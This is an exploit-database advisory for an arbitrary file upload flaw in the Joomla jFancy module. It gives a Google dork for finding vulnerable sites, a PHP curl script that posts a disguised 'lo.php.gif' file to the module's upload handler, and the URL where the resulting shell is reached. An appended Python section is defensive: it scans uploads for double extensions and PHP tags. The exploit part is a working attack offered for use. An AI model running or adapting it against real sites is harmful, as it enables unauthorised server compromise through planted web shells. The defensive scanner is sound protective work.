##################################################
# Description : Joomla Modules - jFancy Arbitrary File Upload Vulnerability
# Version : 2.02
# Link : http://www.joomlaproduction.com/index.php/Modules/jFancy/flypage.tpl.html
# Plugins : register for download
# Google Dork : inurl:/modules/mod_jfancy/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
PostShell.php
<?php
$uploadfile="lo.php.gif";
$ch = curl_init("http://www.exemple.com/modules/mod_jfancy/script.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('photoupload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/images/lo.php.gif
lo.php.gif
<?php
phpinfo();
?>
# 1337day.com [2012-06-09]
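An added defensive example (not part of the original advisory or the module's code): a Python check that an upload handler could apply before saving a file, or that an audit of the images directory could run afterwards, to catch a file like lo.php.gif. The extension list, function names and sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Extensions a PHP-enabled web server may hand to the interpreter (assumed list, extend per site).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n")
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)

def check_upload(name, data):
    """Return the reasons a file is suspicious; an empty list means it passed."""
    reasons = []
    # Check every dot-separated segment: "lo.php.gif" ends in .gif but carries .php.
    segments = os.path.basename(name).lower().split(".")[1:]
    if any(seg in SCRIPT_EXTS for seg in segments):
        reasons.append("script extension in name")
    if not data.startswith(IMAGE_MAGIC):
        reasons.append("not image data")
    if PHP_TAG.search(data):
        reasons.append("PHP open tag in content")
    return reasons

def scan_tree(root):
    """Walk an upload directory; map relative path -> reasons for each flagged file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                reasons = check_upload(fname, fh.read(1 << 20))  # first 1 MiB
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def demo():
    """Build constructed sample files in a temp directory and scan them."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "logo.gif": b"GIF89a" + b"\x00" * 16,    # constructed: plain GIF header
            "lo.php.gif": b"<?php\nphpinfo();\n?>",   # the file shown in the advisory
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(path, "->", ", ".join(reasons))
```

A file that passes should still be stored under a server-generated name in a directory where script execution is disabled.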